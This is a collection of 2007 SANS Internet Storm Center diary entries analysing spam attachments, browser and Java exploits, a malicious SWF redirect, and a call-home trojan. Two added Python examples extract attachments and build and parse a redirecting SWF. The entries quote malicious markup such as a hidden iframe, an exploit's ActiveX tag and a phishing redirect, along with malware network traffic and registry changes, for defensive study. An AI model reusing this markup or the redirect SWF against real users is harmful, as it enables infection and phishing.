I would like to share with you a situation that may occur when you are doing malware analysis.
I use pine to read some of my personal email, and last week I saved one spam that had something attached to it.
While analyzing the saved email, I saw that the file attached to it was base64 encoded.
The first sign is in the body:

Content-Type: application/octet-stream; name="badfile.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="badfile.exe"
X-Attachment-Id: f_f2pdfmt5


Can you spot the line:
Content-Transfer-Encoding: base64

Yes, that means that it is base64 encoded! :)

Now, how to handle it?

That’s what I want to share with you malware analysis enthusiasts today :)

As we can see with the GNU file utility, saved-email.txt is a text file:

[lab3:~/mail# file saved-email.txt
saved-email.txt: ASCII text

I like perl, and it offers a really simple way to decode that file:

[lab3:~/mail# perl -MMIME::Base64 -e 'print decode_base64(join("", <>))' <saved-email.txt >badfile.exe.file

Now, did it work?
Easy, let's use the file utility again:

[lab3:~/mail# file badfile.exe.file
badfile.exe.file: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

Done! :) Now it is just a matter of going ahead and analyzing the file, but that’s another story... ;)
Handlers on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)
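A more robust way to do the same decoding, as an added example that is not part of the diary: parse the saved message as MIME so that only the attachment body is base64-decoded (the perl one-liner above feeds the header text to the decoder as well), then check the leading bytes the way file(1) does. The message and the 64-byte "executable" are constructed for this example.

```python
import base64
import hashlib
from email import message_from_bytes, policy

# Constructed sample: a saved message in the shape described above. The
# "executable" is a fabricated 64-byte blob that only carries the MZ signature.
FAKE_EXE = b"MZ\x90\x00" + b"\x00" * 60
SAMPLE_MESSAGE = b"""From: someone@example.invalid
To: analyst@example.invalid
Subject: your invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

please see the attached file
--XYZ
Content-Type: application/octet-stream; name="badfile.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="badfile.exe"
X-Attachment-Id: f_f2pdfmt5

""" + base64.encodebytes(FAKE_EXE) + b"""--XYZ--
"""

# A few magic numbers: the same kind of check file(1) makes on the decoded bytes
MAGIC = [
    (b"MZ", "MS-DOS/PE executable"),
    (b"\x7fELF", "ELF executable"),
    (b"PK\x03\x04", "ZIP archive"),
    (b"%PDF", "PDF document"),
]


def identify(data):
    """Return a file-type label based on the leading bytes, or 'unknown'."""
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    return "unknown"


def extract_base64_attachments(raw):
    """Parse the saved message and decode every base64-encoded attachment.

    Only the body of each MIME part is base64-decoded, so header text never
    ends up in the output file.
    """
    msg = message_from_bytes(raw, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        cte = (part.get("Content-Transfer-Encoding") or "").strip().lower()
        if cte != "base64" or part.get_content_disposition() != "attachment":
            continue
        data = part.get_payload(decode=True)   # base64 text -> raw bytes
        found.append({
            "filename": part.get_filename(),
            "size": len(data),
            "kind": identify(data),
            "md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest(),
            "data": data,
        })
    return found


if __name__ == "__main__":
    for att in extract_base64_attachments(SAMPLE_MESSAGE):
        print(f"{att['filename']}: {att['size']} bytes, {att['kind']}, md5 {att['md5']}")
```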


Published: 2007-06-10

Yahoo! Messenger exploits seen in the wild

Just three days after the PoCs for two Yahoo! Messenger vulnerabilities were posted (http://isc.sans.org/diary.html?storyid=2943), we’ve been informed by Roger C. from the Malware-Test Lab about a site hosting exploits for the mentioned vulnerabilities.

The exploit is referenced the standard way: an iframe points to the web site hosting the exploit (n.88tw.net). The exploit has been quite simply obfuscated. One thing that makes it easier to identify is the object creation; for some reason the attackers left it outside the obfuscated string, so it is very easy to spot:

<object classid="clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277" id='viewme'></object>

Practically the only difference from the published PoC is the object's name: in this case it is, as you can see above, “viewme”, while the object name in the originally published PoC was “target”.

The rest is very much the same, apart from the attached shellcode. The shellcode in the sample we analyzed downloaded another dropper (of course), and this second component wasn’t detected by any AV vendor on the VirusTotal site when we tested it (!!). This dropper downloaded further components, one of which was called 5in1.exe; we haven’t analyzed this yet, but judging just by the file name, it doesn’t sound good.


As you are probably aware, Yahoo! provided a fix only a couple of hours after the PoCs were posted online (kudos to Yahoo! for this). If you are using Yahoo! Messenger you should upgrade as soon as possible. Alternatively, you can set the kill bits for the affected ActiveX controls, as we posted in our original diary.

One thing that might help as well is AV detection. Although the second stage dropper wasn’t detected by any AV vendor, the JavaScript that triggers the exploit was detected by a couple of programs. As the names were generic (HEUR/Exploit.HTML, JS:Feebs-D, Heuristic.Exploit.HTML), my guess is that those that detected this properly got lucky (the JavaScript used the standard eval(unescape(...)) method). In any case, every defense layer helps.


Published: 2007-06-08

Possible FAA computer glitches?

We are hearing about potential FAA computer glitches on the US east coast. The FAA map shows some flight delays, but the reasons are unclear. We will update this diary as we get additional information.

Update 1: According to CBS, the FAA "experienced computer problems in departure planning early this afternoon, forcing numerous departure delays at airports nationwide. Officials said normal operations began returning between 1 p.m. and 2 p.m."

Update 2 (from Marc): According to the FAA, an FAA aeronautical database that regulates flight departures/arrivals crashed earlier today. The database consists of two systems, one in Atlanta and the other in Salt Lake City. The Atlanta system crashed at 0657 EDT and the Salt Lake City system, which runs off of Atlanta's, crashed quickly thereafter. The systems were back online by 1230 EDT and the current flight delays are a result of the air traffic catching up to the system being down for over five hours. The FAA advised that they have no preliminary information on the cause of the system crash and that it is still under investigation.

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-06-08

Fake Microsoft Security Bulletin -> Malicious Browser Add-On

Dave Edwards let us know about an email message that claims to be a Microsoft Security Bulletin:
Microsoft Security Bulletin MS06-4
Cumulative Security Update for Internet Explorer (113742734)
Published: June 3, 2007
Version: 1.0


Who should read this document: Customers who use Microsoft Windows

Impact of Vulnerability: Remote Code Execution

Maximum Severity Rating: Critical

Recommendation: Customers should apply the update immediately.
Of course, the proper format for the bulletin number would be "MS06-004", not "MS06-4". Second, the number of a bulletin released in 2007 would start with "MS07", not "MS06".

The scheme is what you would expect: the message includes a link to what, it claims, is a patch that is supposed to address the issue. The file, hosted on a remote server, is called "updatems06.exe". It is a UPX-packed executable that is recognized as being malicious by half of the anti-virus engines available to VirusTotal.

The executable installs a malicious browser add-on (BHO) "down.dll" on the victim's system in C:\WINDOWS\system32. Anti-virus engines that recognize the BHO as malware identify it as Agent.avk. This seems to be a downloader that may also be capable of spying on the user's interactions with certain sites.

Update 1:

After analyzing down.dll, Symantec Security Response let us know that the program attempts contacting 3 servers via URLs that look like:
The remote command.php script seems to assist the program in creating a local configuration file that gets saved in %System%\commands.xml. The program uses the XML file to determine how to download and execute other programs from remote locations, saving them as %System%\file.exe.

None of the 3 servers where the program attempts to download the XML file are available at the moment. I find it interesting that 2 of the servers are expected to reside in domains that have not even been registered yet. It is possible that the attacker is still in the process of setting up his or her attack network. The other server is part of a domain that has been registered for a while; however, the server is not currently accessible. Google cache suggests that when the server was up, it was being used to record user passwords, probably as part of another attack campaign.

Update 2:

Please keep in mind that Microsoft never sends out updates as attachments (thanks, Zot!). They have a page explaining the issue:

Update 3:

Upon our request, the ISP controlling the system that was distributing updatems06.exe removed the offending file from the server.

-- Lenny

Lenny Zeltser
InfoSec Practice Leader
Gemini Systems, LLC


Published: 2007-06-08

2 Yahoo! Messenger vulnerabilities (with PoCs)

Two brand new vulnerabilities for Yahoo! Messenger have been published on a couple of security mailing lists. Both vulnerabilities are boundary errors in two ActiveX controls that come with Yahoo! Messenger: Webcam Upload (ywcupl.dll) and Webcam Viewer (ywcvwr.dll).

PoC exploits for the vulnerabilities have been published as well, and they allow execution of arbitrary code. The published PoCs just run the Windows calculator (calc.exe), but it is trivial to change the shellcode, so we can expect some attacks soon.

At the moment, the best mitigation is to set the kill bits for affected ActiveX controls: DCE2F8B1-A520-11D4-8FD0-00D0B7730277 and 9D39223E-AE8E-11D4-8FD3-00D0B7730277.

Thanks to Joshua G. and roseman for alerting us about this.

Update: Yahoo released a patched version of Yahoo! Messenger that addresses these vulnerabilities. For additional information and update instructions, please see http://messenger.yahoo.com/security_update.php?id=060707.


Published: 2007-06-07

DDoS on anti-spam groups

It looks like a pretty big DDoS attack is being carried out against several well known anti-spam groups, including Spamhaus, SURBL and URIBL. The Rules Emporium site that hosts additional (and very useful) rules for SpamAssassin is also not available at this moment; I don’t know if they are under a DDoS attack as well.

The attacks seem to be similar to those carried out against BlueSecurity last year with the Storm malware. Storm is a botnet that can do basically anything, from DDoS attacks to sending spam.

It looks like some anti-spam groups managed to get the attack(s) under control; let’s hope things will stay that way.

On the other side, this looks like the anti-spam tools are doing their job, because spammers seem to be desperate when they launch DDoS attacks (otherwise they would just keep sending spam instead of using their resources this way).


Published: 2007-06-07

A Java exploit

Peter G. reported a malicious Java class that he downloaded yesterday. Now, this certainly looks interesting since this is an exploit for Java VM (not to be confused with JavaScript). This means that, in order to run the exploit, a vulnerable Java VM has to be installed on the machine.

The exploit comes in a small class file:

$ file java.class
java.class: compiled Java class data, version 46.0
$ md5sum java.class
0b67d360d5b1839820c0a39810b40498 java.class

As you probably know, Java class files contain bytecode, which is a machine language for the Java virtual machine. Luckily, bytecode carries *a lot* of extra information, which makes decompilation much easier (and viable, compared to x86 machine code, for example).

After analyzing the exploit, I found out that it’s using an old vulnerability (CVE-2007-0243) that has been patched since January. Mark also wrote about this vulnerability here. According to the CVE article, Sun JRE 5.0 Update 9 or earlier, SDK and JRE 1.4.2_12 or earlier and SDK and JRE 1.3.1_18 or earlier are all vulnerable. The vulnerability allows an applet to gain privileges through a GIF image.

This is exactly what our exploit does: it creates a malicious image that is then displayed on the victim's machine. This causes a memory corruption which leads to code execution.

The sample is completely based on the publicly available PoC code that was posted to various security related mailing lists. The shellcode was, of course, changed; the current shellcode included a downloader which, of course, dropped the second stage (a password stealer).

AV detection

Now we come to an interesting point: the AV detection. I first submitted the Java class to VirusTotal, and the results were shocking: only 1 (!!!) AV program detected the Java class as malicious:
VT results (Java class)

The second stage binary was no picnic either; only a handful of AV programs detected it correctly:
VT results (2nd stage binary)
As this is a more or less standard password stealer I expect AV vendors to add detection shortly.


At this point in time I would say that I’m more worried about the inability to detect the Java class properly. If you remember, back in March I wrote a diary about RTF documents carrying embedded executables (this attack scheme is still used in the BBB/IRS phishing e-mails we wrote about several times). It is clear that AV programs are struggling with all these new formats, another sign that you should always rely on multiple layers of security.
Java upgrades could also be made easier: the multiple available versions often confuse users (which version should I download?), and the fact that old versions are left on the machine after the upgrade certainly does not help in resolving the problem.



Published: 2007-06-07

Analyzing (malicious) SWF file actions

A couple of days ago, Steve P. reported a web page that, when viewed, somehow redirected his browser to another, phishing web site. I initially thought that the original web page just used simple redirection (with or without help from JavaScript), but after analyzing the original site I found out that the phishers used something different.
(I’ll use this opportunity to ask developers of legitimate web sites to try to make their code a bit more readable: stripping all spaces and tabs from your code and using cryptic names for variables doesn’t help analysts at all.)
So, the web site that had the redirection had the following HTML code embedded:

<P><embed src="http://mauke.globat.com/~traderonline-ltd.com/images/a8/cocino.swf"
height="4" width="3"></P>

As you can see above, the web site (which is still live, but the target phishing site has been removed) is actually pulling an SWF (Macromedia Adobe Flash) file. In other words, the redirection was caused by the malicious SWF file, which also means that this will work only if you have Flash installed. While this was obvious, I got interested in how to analyze the actions embedded in SWF files, so I found two nice (and free!) utilities that you might want to bookmark, in case you need to do the same thing in the future.


The first utility is actually a collection called SWFTools (http://www.swftools.org/). This utility is for all you guys that prefer to analyze malware under Linux. The collection consists of various command line utilities for various manipulations of SWF files. The most useful one for our analysis is called swfdump. This small utility can disassemble action tags in SWF files and that’s exactly what we need in this case:

$ swfdump -a cocino.swf
[HEADER] File version: 6
[HEADER] File is zlib compressed. Ratio: 86%
[HEADER] File size: 296 (Depacked)
[HEADER] Frame rate: 12.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 10.00
[HEADER] Movie height: 10.00
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[00c] 263 DOACTION
( 259 bytes) action: GetUrl URL:"http://www.cgi5-eby.com/ws2/eBayISAPI.dll?BuyItem&i..." Label:""
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END

And the action taken is clearly visible at 0x00c: the SWF file uses the GetUrl() action and redirects the browser to the target site.
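An added example (not from the diary or from SWFTools): a short Python script that builds a constructed one-frame SWF with the same tag layout swfdump showed above (SetBackgroundColor, DoAction with a single GetUrl, ShowFrame, End) and then parses it back the way swfdump does, depacking the zlib body and walking the header, the tag list and the GetUrl target inside DoAction. The URL is an assumed placeholder.

```python
import struct
import zlib

# SWF tag codes and ActionScript action codes used here (from the SWF spec);
# they match the [009]/[00c]/[001]/[000] records in the swfdump output.
TAG_END, TAG_SHOWFRAME, TAG_SETBACKGROUNDCOLOR, TAG_DOACTION = 0, 1, 9, 12
ACTION_END, ACTION_GETURL = 0x00, 0x83


def _tag(code, payload):
    """Encode one tag record: short header, or long header for >= 63 bytes."""
    if len(payload) < 0x3F:
        return struct.pack('<H', (code << 6) | len(payload)) + payload
    return struct.pack('<HI', (code << 6) | 0x3F, len(payload)) + payload


def build_redirect_swf(url, compress=True):
    """Constructed sample: a 1-frame SWF whose only action is GetUrl(url)."""
    # RECT: 5-bit field width (11), then xmin, xmax, ymin, ymax in twips (10 px = 200 twips)
    bits = ''.join(format(v, f'0{n}b')
                   for v, n in ((11, 5), (0, 11), (200, 11), (0, 11), (200, 11)))
    bits += '0' * (-len(bits) % 8)                    # pad to a byte boundary
    rect = int(bits, 2).to_bytes(len(bits) // 8, 'big')
    rate_and_count = struct.pack('<HH', 12 << 8, 1)   # 12.0 fps (8.8 fixed), 1 frame
    geturl = url.encode() + b'\0' + b'\0'             # URL string + empty target string
    actions = (bytes([ACTION_GETURL]) + struct.pack('<H', len(geturl)) + geturl
               + bytes([ACTION_END]))
    body = (rect + rate_and_count
            + _tag(TAG_SETBACKGROUNDCOLOR, b'\xff\xff\xff')
            + _tag(TAG_DOACTION, actions)
            + _tag(TAG_SHOWFRAME, b'')
            + _tag(TAG_END, b''))
    total_len = 8 + len(body)          # the length field counts the depacked file
    if compress:
        return b'CWS' + bytes([6]) + struct.pack('<I', total_len) + zlib.compress(body)
    return b'FWS' + bytes([6]) + struct.pack('<I', total_len) + body


def _geturl_actions(payload):
    """Walk a DoAction body and return the URL of every GetUrl action in it."""
    urls, pos = [], 0
    while pos < len(payload):
        code = payload[pos]
        pos += 1
        if code == ACTION_END:
            break
        data = b''
        if code >= 0x80:               # actions >= 0x80 carry a length-prefixed body
            (length,) = struct.unpack_from('<H', payload, pos)
            pos += 2
            data = payload[pos:pos + length]
            pos += length
        if code == ACTION_GETURL:
            url, _target = data.split(b'\0')[:2]
            urls.append(url.decode('latin-1'))
    return urls


def analyze_swf(data):
    """Parse the SWF header and tag list; collect GetUrl targets from DoAction tags."""
    sig, version = data[:3], data[3]
    if sig not in (b'FWS', b'CWS'):
        raise ValueError('not an SWF file (bad signature)')
    (declared_len,) = struct.unpack_from('<I', data, 4)
    body = zlib.decompress(data[8:]) if sig == b'CWS' else data[8:]
    if declared_len != 8 + len(body):
        raise ValueError('length field does not match the depacked size')
    nbits = body[0] >> 3                       # RECT: top 5 bits give the field width
    pos = (5 + 4 * nbits + 7) // 8             # skip the byte-aligned RECT
    frame_rate, frame_count = struct.unpack_from('<HH', body, pos)
    pos += 4
    tags, urls = [], []
    while pos + 2 <= len(body):
        (head,) = struct.unpack_from('<H', body, pos)
        pos += 2
        code, length = head >> 6, head & 0x3F
        if length == 0x3F:                     # long header form
            (length,) = struct.unpack_from('<I', body, pos)
            pos += 4
        payload = body[pos:pos + length]
        pos += length
        tags.append(code)
        if code == TAG_DOACTION:
            urls.extend(_geturl_actions(payload))
        if code == TAG_END:
            break
    return {'version': version, 'compressed': sig == b'CWS',
            'depacked_size': declared_len, 'frame_rate': frame_rate / 256.0,
            'frame_count': frame_count, 'tags': tags, 'geturl_targets': urls}


if __name__ == '__main__':
    sample = build_redirect_swf('http://phish.example.invalid/login')   # assumed placeholder
    print(analyze_swf(sample))
```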


The second utility that you can use to analyze this file is JSwiff (http://www.jswiff.com/). JSwiff is a Java framework for SWF file creation and manipulation. As it’s completely written in Java, you can start JSwiff on any platform.
JSwiff is a very simple GUI based utility that will immediately show all SWF headers and tags, as you can see below:




Published: 2007-06-06

Sun JRE Vulnerabilities

Security Vulnerabilities in the Java Runtime Environment Image Parsing Code may Allow an Untrusted Applet to Elevate Privileges

A buffer overflow vulnerability in the image parsing code in the Java Runtime Environment may allow an untrusted applet or application to elevate its privileges. For example, an applet may grant itself permissions to read and write local files or execute local applications that are accessible to the user running the untrusted applet.

A second vulnerability may allow an untrusted applet or application to cause the Java Virtual Machine to hang.

Both vulnerabilities can be exploited in the following versions

  • JDK and JRE 6
  • JDK and JRE 5.0 Update 10 and earlier
  • SDK and JRE 1.4.2_14 and earlier
  • SDK and JRE 1.3.1_20 and earlier

Updates are available, see the Sun alert for full details.

HOD: Christopher Carboni


Published: 2007-06-06

More PHP Phun

Jack wrote in to tell us that US-CERT posted the following advisory:

US-CERT is aware of a publicly reported vulnerability in PHP. PHP version 5.2.3 may be vulnerable to an integer overflow within the chunk_split() function.

More information can be found in the following PHP Security Blog.

US-CERT will provide additional information as it becomes available.

Thanks Jack.

HOD: Christopher Carboni


Published: 2007-06-05

Iframe > malicious javascript > trojan

Another iframe on a compromised server pointing to JavaScript which then downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this:

<bo dy><i frame src='hxxp:// index.php' width='1' height='1' style='visibility: hidden;'></i frame>

The unencoded JavaScript at index.php then downloaded and ran hxxp:// file.php, a binary PE trojan.

Here is what VirusTotal had to say about file.php:

AntiVir 06.05.2007 TR/Small.MI.25
AVG 06.05.2007 Generic4.SJO
BitDefender 7.2 06.05.2007 Trojan.Agent.AXB
DrWeb 4.33 06.05.2007 Trojan.DownLoader.23162
eSafe 06.05.2007 Win32.Small.mi
eTrust-Vet 30.7.3693 06.05.2007 Win32/Chepvil!generic
Ewido 4.0 06.05.2007 Trojan.Small.mi
F-Secure 6.70.13030.0 06.05.2007 Trojan.Win32.Small.mi
Ikarus T3.1.1.8 06.05.2007 Trojan.Win32.Small.mi
Kaspersky 06.05.2007 Trojan.Win32.Small.mi
Microsoft 1.2503 06.05.2007 TrojanDownloader:Win32/Agent!EF3C
Norman 5.80.02 06.05.2007 W32/Smalltroj.BHMK
Prevx1 V2 06.05.2007 Polynomial.Code.Exploit
Sophos 4.18.0 06.01.2007 Mal/Clagger-E
TheHacker 06.04.2007 Trojan/Small.mi
VirusBuster 4.3.23:9 06.05.2007 no virus found
Webwasher-Gateway 6.0.1 06.05.2007 Trojan.Small.MI.25

Additional Information
File size: 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113

The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and infecting web users. If you are notified that a system you run or own is involved in an incident please take action as soon as you can.



Published: 2007-06-04

Firefox and IE Zero Days

Michal Zalewski has reported several browser bugs worth alerting on.

The information was posted to the Full-Disclosure mailing list and has been reported on in Computer World:

Thanks to several readers that made sure we took note.

Here is a brief summary of his report. Please refer to Full-Disclosure for more details:

1) Title : MSIE page update race condition (CRITICAL)
Impact : cookie stealing / setting, page hijacking, memory corruption
Affected : MSIE6 and MSIE7

2) Title : Firefox Cross-site IFRAME hijacking (MAJOR)
Impact : keyboard snooping, content spoofing, etc
Affected : Firefox 2.0

3) Title : Firefox file prompt delay bypass (MEDIUM)
Impact : non-consensual download or execution of files
Affected : Firefox v?.?

4) Title : MSIE6 URL bar spoofing (MEDIUM)
Impact : mimicking an arbitrary site, possibly including SSL data
Affected : MSIE6



Published: 2007-06-04

New Malware SPAM

One of our readers (thanks Michael) reported receiving a password protected zip file as SPAM with the password included in the HTML body of the email.

The SPAM From: line may show a news organization. However, the actual sources of the email are all over the map. Hopefully most people have been trained by now not to trust the From: line or reply to spammy-looking emails.

Sample Subject Lines:
Subject: Re: U.S. violent crime up again, more murders, robberies
Subject: Man Awakens From 19-Year Coma
Subject: Law hits Las Vegas &apos;fake&apos; bands

Several of the samples included body text such as:

Decade Of Mystery: John Ramsey Speaks
Man wakes from 19-year coma in
Poland US vows to pursue hunt for missing soldiers
 Password for submitted attachment is xxx

Attachments include names such as "<news organization>-news<digits>.zip"

At the moment AV coverage (of the uncompressed file) is spotty:

File size: 40960 bytes
MD5: efff306b3296b18a94fea8491b960ab0
SHA1: 11afce9edf86386f0383bd162cff428a7fdf27bd
packers: UPX
AhnLab-V3 2007.5.31.2 06.04.2007 no virus found
AntiVir 06.04.2007 no virus found
Authentium 4.93.8 05.23.2007 no virus found
Avast 4.7.997.0 06.04.2007 Win32:Agent-GPS
AVG 06.03.2007 no virus found
BitDefender 7.2 06.04.2007 no virus found
CAT-QuickHeal 9.00 06.04.2007 no virus found
ClamAV devel-20070416 06.04.2007 no virus found
DrWeb 4.33 06.04.2007 no virus found
eSafe 06.04.2007 suspicious Trojan/Worm
eTrust-Vet 30.7.3690 06.04.2007 no virus found
Ewido 4.0 06.04.2007 no virus found
FileAdvisor 1 06.04.2007 no virus found
Fortinet 06.02.2007 suspicious
F-Prot 06.04.2007 no virus found
F-Secure 6.70.13030.0 06.04.2007 no virus found
Ikarus T3.1.1.8 06.04.2007 no virus found
Kaspersky 06.04.2007 no virus found
McAfee 5045 06.04.2007 no virus found
Microsoft 1.2503 06.04.2007 no virus found
NOD32v2 2307 06.04.2007 no virus found
Norman 5.80.02 06.04.2007 no virus found
Panda 06.04.2007 no virus found

The binary, once executed, appears to call home via an HTTP POST to at least one of two websites:
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
13749 | | | US | arin | 2000-10-05 | EVERYONES-INTERNET - Everyones Internet
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
21844 | | | US | arin | 2006-02-17 | THEPLANET-AS - THE PLANET

Here are the partially sanitized details from one such call home:

POST /forum.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: */*
Accept-Language: en
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=4AFEAB473A5F7
Content-Length: 587

Content-Disposition: form-data; name="sid"
Content-Disposition: form-data; name="up"
Content-Disposition: form-data; name="wbfl"
Content-Disposition: form-data; name="v"
Content-Disposition: form-data; name="ping"
Content-Disposition: form-data; name="guid"
Content-Disposition: form-data; name="wv"

In response to this post the webserver returns a binary file:

HTTP/1.1 200 OK
Date: Mon, 04 Jun 2007 17:22:01 GMT
Server: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e mod_autoindex_color PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 260
Connection: close
Content-Type: multipart/form-data; boundary="4AFEAB473A5F7"

Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
0d0a 2768 727f 252d 2e2d 2a2e 2928 2c2a ..'hr.%-.-*.)(,*
2a22 2b28 292d 2a27 3468 727f 2511 2779 *"+()-*'4hr.%.'y
7774 7870 2511 276d 2511 292f 2b11 2734 wtxp%.'m%.)/+.'4
6d25 1127 6825 112c 2f35 2e29 352c 2935 m%.'h%.,/5.)5,)5
2e23 2123 2b16 1129 2a2d 352f 2b35 292b .#!#+..)*-5/+5)+
2f35 2a2b 2d21 232b 1127 3468 2511 2734 /5*+-!#+.'4h%.'4
7977 7478 7025 ywtxp%

I have included the hexdump of COMMON.BIN unsanitized above for anyone wanting to take it apart (and please submit your analysis to our contact page if you would). It is possibly an encoded config file.

Here are the system modification details:
Creates file C:\WINDOWS\ws386.ini.
Creates file C:\WINDOWS\s32.txt.
Creates key "HKLM\System\CurrentControlSet\Services\aspimgr".
Sets value "ImagePath"="C:\WINDOWS\SYSTEM\aspimgr.exe" in key "HKLM\System\CurrentControlSet\Services\aspimgr".
Sets value "DisplayName"="Microsoft ASPI Manager" in key "HKLM\System\CurrentControlSet\Services\aspimgr".
Creates key "HKLM\Software\Microsoft\Sft".
Sets value "default"="{00000000-0000-0000-0000-00003F000F00}" in key "HKLM\Software\Microsoft\Sft".

In addition to our readers who submitted information, I'd also like to thank Anubis, Norman, and Sunbelt for their excellent analysis results.


Published: 2007-06-03

Invalid ssl certs ...

We all know them: invalid ssl certs. But how bad are they? And what can we do to improve the situation?


Basically, the users are a weak link in multiple directions. If we teach users that bad ssl certs are OK to accept and that they can continue as if nothing is wrong, we are taking away all their defense against man in the middle attacks.

Equally, we allow our users to accept and continue interacting with websites that, by providing an invalid certificate, have actually proved there is something wrong with them.

We should get to a situation where we can teach our users in awareness sessions to *never* accept an ssl cert that is apparently bad.

In order to get there, we need to make sure we get good certificates signed by a recognized CA in all our uses of ssl certs such as our websites. One of the things to do is to take care with "temporary" setups and to make sure we are proactive in renewing certificates.

Is your calendar marked to renew your certs?
Do you know when they will expire?

Man in the middle

Man in the middle attacks on ssl enhanced connections are actually prevented by having the certificates and the ability to verify them. The security is for a large part centered in the procedures used by the certificate authorities (CAs) you choose to accept.

As long as we cannot teach or prevent users from accepting bad certificates, we will always lose this fight. Phishers and the like can work through ssl+strong authentication if we let our users fall prey to man in the middle attacks.

Do you teach your users the hazards of bad certificates?

Self-signed certificates

Self-signed certificates, having no recognized CA signing them, aren't by definition bad. They do however complicate things: users should verify the certificate before accepting it. Such verification can be done using a fingerprint and an out of band communication. As this means additional work, one would expect the use of a recognized CA to be simpler; still, one finds self-signed certificates often.

If you use self-signed certificates, make sure you know how your users will (or will not) deal with them, make sure to set up that out of band verification, and make sure that you have the right reason to do this. If you use a PKI infrastructure, make sure all users have your root certificates as needed so they do not get errors.

If you have self-signed certificates, how many times do you get called for verifying the fingerprint(s)?


A certificate authority should have very strict procedures to verify you are who you claim to be before signing your public key. There have been a few problems in the past with reputable companies, e.g. signing certificates claiming to belong to a well known software vendor. So these procedures are not foolproof. That's why there are revocation lists; unfortunately many clients neglect to check those lists.

Not all CAs use the same procedures to verify whose certificate they sign, so choosing the right one is key: you want as many as possible of the others to recognize the CA as being a good and reputable company with strict rules, but you want them to be flexible enough that, especially when they are located in another country, they are possible to work with and actually have procedures where you can jump through their hoops.

Do you know what CAs are out there? What the strength of their procedures is?
How was your CA selected?
Do you know what CAs are in your browser?

Browser makers

Most of us think of the users as the weakest links, but honestly, the browsers the users use are the weakest link in reality. They simply lack any backbone in preventing the users from hurting themselves.

Doesn't your car make an annoying noise when you do not wear your seatbelt while driving it?

Then why does your browser only need an obscure "next" to proceed on to a website that has a bad cert? Why not:

  • Prevent access to websites with bad ssl certs (the site basically proved it isn't who it claims to be!), putting the burden of having the right certificates on the website owners.
  • Show a red overlay on every pageload/refresh warning the user the site is not to be trusted
  • Not to allow use of forms to send data to a https site that has a bad cert
  • Not to load images, scripts, ... from such sites
  • ...

And as far as bad certificates go, how about telling the user what is wrong with the certificate in understandable language? While at it, make the text there easy to cut and paste so users can talk with the administrators.

While this might seem hard to sell to consumers, I'm not sure it would be that hard to sell to administrators in a company wanting to step up security a notch or two.

Since browser makers also choose for most of the world which CAs are trusted and which are not, how about making that choice a bit more under the control of the administrators of the computer? E.g. if you delete a CA's root cert, how about not adding it again at every patch, making the admin redo the thing over and over.

Did you think of the impact of users switching browsers on the list of CAs they trust?


I think we need to eradicate bad certificates on all of our websites. Next, teach our users significantly better habits, and start by increasingly making those bad habits harder to have in the browsers we let our users use.

Swa Frantzen -- NET2S


Published: 2007-06-03

IIS 5.0 authentication bypass exploit -- CVE-2007-2815

David wrote in pointing us to an exploit against IIS 5.0 and 5.1. The issue was discovered on December 15, 2006, and has been public since the end of May 2007. The design of IIS 5.x allows basic authentication to be bypassed by using the hit highlighting feature.

Microsoft's response seems a bit atypical for them, as it includes a section on how to reproduce the exploit. In other words: Microsoft is telling the world how to exploit their products as used by their customers. Not that the worst of those interested in it did not already know, but the one thing we need from Microsoft is not the exploit but the patch, or at least a decent work-around. And that patch is lacking. Their only defensive advice is to upgrade to IIS 6.0.

This means that you would also need to upgrade Windows 2000 or XP to Windows 2003, and such an upgrade isn't free, nor easy. So what do we do when Microsoft does not give any advice other than to upgrade to IIS 6.0? Let's look at alternatives.

Feel free to write in if you know more effective alternatives:

  • Most probably there is a way to remove something or change some registry setting to prevent this; unfortunately exactly what is neither documented nor validated.
    Eric told us: "If you don't use the web hits functionality, a simple workaround would be to remove the script mapping for .htw files". Without a script mapping, IIS should treat the file as static content.
  • Try to use application level firewalls (filters). While they aren't the easiest to configure, considering all the ways URLs can be encoded, it's something that might help for a while, but getting it fully right will be a pain. If you have the infrastructure it can be a temporary measure until you can upgrade IIS, solving the actual problem.
  • URLScan, a URL filter by Microsoft, can actually be used to stop access to .htw files and is reported by some readers as being effective. While a URL scanner inside the web server might know all possible encodings, it remains the poor man's choice, but most likely good enough as a workaround in the short run, provided you do not need .htw functionality.
  • A number of readers are preventing access to files by managing rights on the confidential files or directories themselves. To people used to Apache this sounds odd, but IIS uses OS level users, and therefore the permissions set in the filesystem can be used to limit rights; this will protect against server side scripts walking the document root tree as well.
  • Upgrade to Apache or another web server, with or without a (cross) upgrade of the OS.
  • Scramble an upgrade to Windows 2003, potentially on more potent hardware.

Some URLs:

While the public exploits seem to focus on leaking protected information, the ability to execute code is unexplored, but hinted about.

I normally avoid broadcasting exploitable information, but since Microsoft themselves are already telling the world, take a look in your IIS logs for hits like:


